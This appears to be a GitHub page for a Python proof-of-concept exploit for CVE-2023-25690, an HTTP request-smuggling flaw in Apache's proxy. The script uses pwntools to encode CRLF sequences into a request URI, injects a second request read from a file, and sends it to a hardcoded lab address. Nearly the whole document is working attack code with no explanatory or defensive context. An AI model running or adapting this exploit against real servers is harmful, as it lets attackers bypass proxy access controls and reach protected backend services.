-
Notifications
You must be signed in to change notification settings - Fork 1
/
CVE-2023-25690.py
43 lines (37 loc) · 1.09 KB
/
CVE-2023-25690.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *
def request_prepare():
hexdata = open("pre.txt", "rb").read()
# print(hexdata)
hexdata = hexdata.replace(b' ', b'%20')
hexdata = hexdata.replace(b'\r\n', b'%0d%0a')
hexdata = hexdata.replace(b'?', b'%3f')
hexdata = hexdata.replace(b'=', b'%3d')
# print(hexdata)
uri = b'/categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0aUser-Agent:%20Mozilla/5.0%20(' \
b'Windows%20NT%2010.0;%20Win64;%20x64;%20rv:120.0)%20Gecko/20100101%20Firefox/120.0%0d%0a%0d%0a' + hexdata + \
b'%0d%0a%0d%0aGET%20/abc'
reqst = b'''GET %b HTTP/1.1\r
Host: 192.168.27.139\r
\r
''' % uri
return reqst
def send_and_recive(req):
rec = b''
ip = '192.168.27.139'
port = 80
p = remote(ip, int(port))
p.send(req)
rec += p.recv()
print(rec.decode())
p.close()
return rec.decode()
req = request_prepare()
print(req)
# print(urllib.parse.unquote(req.decode()))
f = open('req.txt', 'wb')
f.write(req)
f.close()
res = send_and_recive(req)
f = open('res.txt', 'wb')
f.write(res.encode())
f.close()